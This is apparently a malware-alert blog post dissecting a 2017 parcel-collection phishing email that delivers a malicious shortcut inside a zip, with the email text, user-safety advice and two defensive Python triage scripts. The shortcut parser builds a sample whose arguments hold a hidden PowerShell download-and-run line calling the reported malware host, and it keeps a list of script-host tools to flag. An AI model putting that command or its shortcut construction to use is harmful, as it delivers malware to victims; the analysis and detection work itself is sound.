The next in the never-ending series of attempts to deliver malware is an email with the subject of "Miss [Recipient name redacted for privacy reasons], Your package has been collected from store", coming from, or pretending to come from, firstname.lastname@example.org (this email was forwarded to me, so I don't have the full headers to verify the actual sender).
The main reason for posting this is that all of the recipient's full and correct details are in the email: full and correct name, address, and home and mobile phone numbers. We have no idea where the details came from, but they must have come from one of the breaches of the last year or so; however, no trace of the email address comes up in https://haveibeenpwned.com/, which indicates that it is not a known breach, or at least not a breach where the details have so far been publicly posted anywhere. The malware bots sending these have this time muddled up the order of the entries, so the phone numbers are mixed up inside the address details. The recipient has had similar messages in the past containing her details, and we are still no closer to knowing the source of the leakage or breach.
They use email addresses and subjects that will entice, persuade, scare or shock a recipient into reading the email and opening the attachment.
The link in the email is to https://knowyourchain.com/manage/81MU-56704-package-status, which downloads a zip file.
81MU-56704-package-status.zip extracts to 2 files: customers package details.lnk (Current VirusTotal detections | Payload Security | JoeSandbox) and a clip-art image of an envelope in PNG format, which looks innocent although it has a slightly larger file size than I would normally expect for an image of this size (VirusTotal).
The .lnk file contains this URL, from which it downloads something via PowerShell: https://awesomebenies.com/nodiva/brop
I cannot get any malware from the .lnk file, nor could either of the online sandboxes I tried. You either get a 404 file not found or a 403 forbidden.
It looks like both malware delivery sites have some sort of IP protection or filtering on them, so you only get one attempt to download the file(s) and your IP is blocked afterwards. It is highly likely that known sandbox and antivirus IP ranges are automatically blocked. The initial Knowyourchain download link only appears to allow connections from a UK IP address: https://check-host.net/check-report/411c912k462
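When the download site has already gone dark, the shortcut itself is still worth reading, because the target path, arguments and any URLs it carries are all stored in plain StringData fields of the Shell Link format. As an added illustration (not the post's own tooling), here is a small Python parser that pulls those fields out of a .lnk without resolving or running it, and flags a script host such as PowerShell being pointed at a URL. The sample shortcut it builds is constructed for this example: the URL is the one reported above, but the PowerShell command line wrapped around it, the relative path and the icon location are assumptions, not what was recovered from the real file.

```python
import re
import struct
import sys

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = (                         # StringData entries appear in exactly this order
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "certutil", "bitsadmin")


def _read_string(data, offset, unicode):
    """Decode one StringData entry: uint16 CountCharacters followed by the characters."""
    (count,) = struct.unpack_from("<H", data, offset)
    offset += 2
    if unicode:
        end = offset + count * 2
        return data[offset:end].decode("utf-16-le"), end
    end = offset + count
    return data[offset:end].decode("cp1252", errors="replace"), end


def parse_lnk(data):
    """Return the StringData fields of a shell link without executing or resolving anything."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize excludes its own 2 bytes
        (id_list_size,) = struct.unpack_from("<H", data, offset)
        offset += 2 + id_list_size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize includes its own 4 bytes
        (link_info_size,) = struct.unpack_from("<I", data, offset)
        offset += link_info_size
    fields = {}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            fields[name], offset = _read_string(data, offset, bool(flags & IS_UNICODE))
    return fields


def triage_lnk(data):
    """Pull URLs out of the link's strings and flag a script host being pointed at one."""
    fields = parse_lnk(data)
    urls = URL_RE.findall(" ".join(fields.values()))
    launch = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    uses_lolbin = any(tool in launch for tool in LOLBINS)
    return {"fields": fields, "urls": urls, "suspicious": uses_lolbin and bool(urls)}


def build_sample_lnk(relative_path, arguments, icon_location):
    """Constructed sample for offline testing: minimal header, empty IDList, Unicode strings."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = (struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0)  # size, CLSID, flags, attributes
              + bytes(24)                                               # three FILETIMEs, left zero
              + struct.pack("<III", 0, 0, 7)                            # FileSize, IconIndex, ShowCommand=SW_SHOWMINNOACTIVE
              + bytes(12))                                              # HotKey + reserved
    id_list = struct.pack("<H", 2) + b"\x00\x00"                        # IDList holding only the TerminalID

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + s(relative_path) + s(arguments) + s(icon_location)


# Constructed stand-in for the campaign's "customers package details.lnk": the URL is the one the
# post reports; the PowerShell command line around it is assumed, not recovered from the sample.
SAMPLE_LNK = build_sample_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://awesomebenies.com/nodiva/brop')\"",
    "%SystemRoot%\\System32\\shell32.dll",   # a harmless-looking stock icon
)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    for key, value in triage_lnk(blob).items():
        print(f"{key}: {value}")
```

Run it as `python lnk_triage.py "customers package details.lnk"` against a saved copy; with no argument it triages the constructed sample. The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their declared sizes rather than interpreting them, because the StringData fields after them are where the command line lives, and parsing a hostile IDList buys nothing for this purpose.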
One of the emails looks like:
Date: 03/10/2017 – 16:34 (GMTDT)
Subject: [Miss Recipient name redacted for privacy reasons], Your package has been collected from store
Hello, Miss Recipient name redacted for privacy reasons
Your order is now safely with us. The details of your order are below.
Your order confirmation is below. Thank you again for your business.
Miss Recipient name redacted for privacy reasons
50 redacted 121redacted
7770redacted Sutton Coldfield
Details for order 81MU-56704
For detailed information, quick order adjustment or cancellation, please
use the special link form provided below
Please make sure you’ve read our terms conditions, we recommend that you
print a copy of these for future reference. You may also want to see
details of the Distance Selling Regulations and our 30-day money back
guarantee. Under the Distance Selling Regulations, you have a right to
cancel your order for any item purchased on this website for a full
refund. To cancel, you can email customer services write to us at
Customer Services (see contact us for details) within seven working days
(so not including Saturdays, Sundays or public holidays) commencing the
day after the day of delivery of your item(s) quoting your order number.
You must take reasonable care of the item(s). Item(s) may be returned to
an hqswtz store, or we can arrange collection free of charge. You may
cancel an order for services in the same way, within seven working days
(so not including Saturdays, Sundays or public holidays) of the date of
purchase, unless the services begin sooner. You may not however cancel
accommodation, transport or leisure services which occur on a specific
date. The Distance Selling Regulations do not apply to Financial and
Insurance Services. We take security of your details seriously. We may
send you emails from time to time but we would never send an email
asking for your log on or card details. See online security for further
Email transmission cannot be guaranteed to be secure, or without error
as information could be intercepted, corrupted, lost, destroyed, late in
arriving or incomplete as a result of the transmission process. The
sender therefore does not accept liability for any errors or omissions
in the contents of this message which arise as a result of email
Please check your goods on receipt. Missing or damaged items should be
brought to the attention of the driver of the parcel service immediately
and recorded on the delivery note. Please inform us about the damaged or
missing item within three working days by sending an e-mail to us
We would like to remind you that sometimes a large shipment consisting
of several parcels may be grouped into several smaller deliveries that
may not arrive all on the same day.
Please note that failure to report a missing item will result in you
being invoiced for it.
We are unable to accept complaints about missing or damaged items if you
have issued us with a written permission to deposit the parcel at a
suitable place should you not be present at the time of delivery.
We apologize for any inconvenience this may cause.
We’d like you to be happy with everything you purchase from YVI Click.
Should you change your mind about your purchase, please return the
product with your proof of purchase, within 30 days, and we’ll happily
offer a replacement or refund. There are some products for which we
cannot accept change of mind, or may not offer you a full refund – full
details can be found in our Returns Policy. Our Returns Policy is in
addition to and does not affect your legal rights, including your right
to return faulty products.
If you change your mind about any item in your order, simply hand it
back to the driver at the time of delivery or member of staff when using
Click+Collect. You may also return items to any YVI Click store. We ask
that perishable food items are returned within their use by date. Please
also let us have the tags, labels and any accessories.
Please note, that we may not provide you with a full refund if you have
handled the goods beyond what is necessary to establish the nature,
characteristics and functioning of the goods.
If you’ve handed the item(s) back to the delivery driver or a member of
staff when using Click+Collect, we’ll arrange for a refund. If you
return it to a store, you can choose either a refund or an exchange.
We’ll refund your money in the same way you paid for your product, and
no later than 14 days after you return the item.
Thank you for placing your order with us. We really appreciate your
custom and will do everything within our power to ensure you get the
very best of service.
All the alleged senders, amounts, reference numbers, bank codes, companies, names of employees, employee positions, email addresses and phone numbers mentioned in the emails are random. Some of these companies will exist and some won't. Don't try to respond by phone or email; all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, government departments and organisations, with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.
Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.
Previous campaigns over the last few weeks have delivered numerous different download sites and malware versions. There are frequently 5 or 6, and on some days up to 150, download locations, sometimes delivering exactly the same malware from all locations and sometimes slightly different malware versions. Locky does update at frequent intervals during the day, sometimes as often as every hour, so you might get a different version of this nasty ransomware.
This is another one of the files that, unless you have "show known file extensions" enabled, can easily be mistaken for a genuine DOC / PDF / JPG or other common file instead of the .EXE / .JS file it really is, making it much more likely that you will accidentally open it and be infected. Note that a shortcut (.lnk) file like the one in this campaign is worse still: Windows never displays the .lnk extension in Explorer, even with known extensions switched on, so the small arrow overlay on the icon and the "Shortcut" entry in the Type column are the only visible giveaways.
Be very careful with email attachments. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email, whether it is a message saying "look at this picture of me I took last night" that appears to come from a friend, or something more targeted at somebody who is likely to regularly receive PDF attachments, Word .doc attachments or any other common file that you use every day.
The basic rule is NEVER open any attachment to an email unless you are expecting it. That is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of themselves doing silly things, or cute pictures of the children or pets.
Never just blindly click on the file in your email program. Always save the file to your downloads folder so you can check it first. Many malicious files attached to emails have a faked extension, that is, the three (or more) letters after the last dot in the file name. Unfortunately Windows hides file extensions by default, so you need to set your folder options to show known file types (in File Explorer Options, View tab, untick "Hide extensions for known file types"). Then, when you unzip the zip file that is supposed to contain the pictures of "Sally's dog catching a ball", or a report in Word format that work has supposedly sent you to finish at the weekend, or an invoice or order confirmation from some company, you can easily see whether it is a picture or document and not a malicious program.
If you see .JS, .EXE, .COM, .PIF, .SCR, .HTA, .vbs, .wsf, .jse or .jar (or, as in this campaign, .lnk) at the end of the file name, DO NOT click on it or try to open it; it will infect you.
While the malicious program is inside the zip file it cannot harm you or run automatically. When it is just sitting unzipped in your downloads folder it won't infect you, provided you don't click it to run it. Just delete the zip and any extracted file and everything will be OK. You can always run a scan with your antivirus to be sure. A plain zip file cannot run its contents by itself, but double-clicking a zip opens it as a folder in Explorer, and one more double-click on a file inside runs that file straight from a temporary extraction folder, which is how people get caught. If you right-click any suspicious zip file you receive (after saving it to a folder on the computer) and select "Extract here" or "Extract to folder", that risk is virtually eliminated. Never attempt to open a zip directly from your email; that is a guaranteed way to get infected. The best way is to just delete the unexpected zip and not risk any infection.
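An added example (not part of the original post) of checking a saved zip before extracting anything: it lists the members, their sizes and the first bytes of each, and flags executable or double extensions, names carrying a right-to-left override character, and files whose content does not match what the extension claims (a PE file or a shortcut named as a picture, for instance). The archive it builds is constructed: it reuses the two member names reported above with made-up contents, and adds a third member, invoice.pdf.exe, to show the double-extension case the advice above warns about.

```python
import io
import os
import zipfile

# Extensions the post warns about, plus the shortcut and script types seen in this style of campaign
EXECUTABLE_EXTS = {".js", ".exe", ".com", ".pif", ".scr", ".hta", ".vbs", ".wsf", ".jse", ".jar",
                   ".lnk", ".bat", ".cmd", ".ps1", ".vbe"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".jpeg", ".png", ".txt", ".rtf"}
# First bytes a genuine file of each type starts with
SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF",
    ".exe": b"MZ",
    ".lnk": b"\x4c\x00\x00\x00",
}
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"   # HeaderSize 0x4C followed by the start of LinkCLSID


def triage_member(name, head):
    """Reasons a zip member looks dangerous, judged from its name and its first bytes only."""
    base = os.path.basename(name.replace("\\", "/"))
    exts = ["." + part for part in base.lower().split(".")[1:]]
    last = exts[-1] if exts else ""
    reasons = []
    if last in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {last}")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS:
        reasons.append(f"double extension: looks like {exts[-2]} but runs as {last}")
    if any(ch in base for ch in "\u202e\u202d"):
        reasons.append("Unicode right-to-left override hides the real extension")
    if last in SIGNATURES and not head.startswith(SIGNATURES[last]):
        reasons.append(f"content does not start with the {last} signature")
    if head.startswith(b"MZ") and last not in (".exe", ".dll", ".scr", ".com"):
        reasons.append("PE executable disguised under a different extension")
    if head.startswith(LNK_MAGIC) and last != ".lnk":
        reasons.append("Windows shortcut disguised under a different extension")
    return reasons


def triage_zip(data):
    """List every member with its size and findings without extracting anything to disk."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:     # read only the first 8 bytes of each member
                head = member.read(8)
            findings.append({"name": info.filename, "size": info.file_size,
                             "reasons": triage_member(info.filename, head)})
    return findings


def dangerous_members(data):
    return [f["name"] for f in triage_zip(data) if f["reasons"]]


def build_sample_zip():
    """Constructed archive: the two member names the post reports plus a double-extension member."""
    fake_lnk = LNK_MAGIC + bytes(72)                       # header-sized stand-in for the shortcut
    fake_png = SIGNATURES[".png"] + bytes(64)              # starts like a real PNG
    fake_exe = b"MZ" + bytes(62)                           # DOS stub marker of a PE file
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("customers package details.lnk", fake_lnk)
        zf.writestr("envelope.png", fake_png)
        zf.writestr("invoice.pdf.exe", fake_exe)
    return buf.getvalue()


SAMPLE_ZIP = build_sample_zip()

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ZIP
    for f in triage_zip(blob):
        flag = "DANGER" if f["reasons"] else "ok"
        print(f"{flag:6} {f['size']:8d} {f['name']}  {'; '.join(f['reasons'])}")
```

Run it as `python zip_triage.py 81MU-56704-package-status.zip` on the saved attachment. Nothing is written to disk: each member is opened from the archive only far enough to read its first eight bytes, so a member that is a program or a shortcut is never dropped into a folder where a stray double-click could run it.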